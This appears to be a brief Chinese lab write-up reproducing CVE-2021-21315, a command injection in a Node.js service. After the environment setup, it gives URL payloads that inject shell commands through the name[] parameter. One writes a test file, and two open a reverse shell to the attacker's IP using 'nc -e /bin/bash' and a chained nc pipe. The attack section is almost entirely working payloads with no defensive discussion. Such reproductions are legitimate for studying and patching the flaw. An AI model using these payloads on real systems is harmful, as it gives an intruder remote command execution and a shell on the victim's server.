CVE-2021-21315漏洞复现

一、基本信息

攻击机：kali IP:192.168.100.60

靶机：CentOS7 IP:192.168.100.40

二、攻击过程

下载node.js环境

wget https://nodejs.org/dist/v12.18.4/node-v12.18.4-linux-x64.tar.xz
tar -xvf node-v12.18.4-linux-x64.tar.xz
mv node-v12.18.4-linux-x64 nodejs
mv nodejs/ /usr/local/sbin/
ln -s /usr/local/sbin/nodejs/bin/node /usr/local/bin/
ln -s /usr/local/sbin/nodejs/bin/npm /usr/local/bin/

进入指定目录

运行环境

浏览器测试

http://192.168.100.40:8000/api/getServices?name[]=$(echo -e 'zeeker' > test.txt)

测试结果

反弹shell

http://192.168.100.40:8000/api/getServices?name[]=$(nc -e /bin/bash 192.168.100.60 7777)

http://192.168.100.40:8000/api/getServices?name[]=$(nc 192.168.100.60 7777| /bin/bash | nc 
192.168.100.60 8888)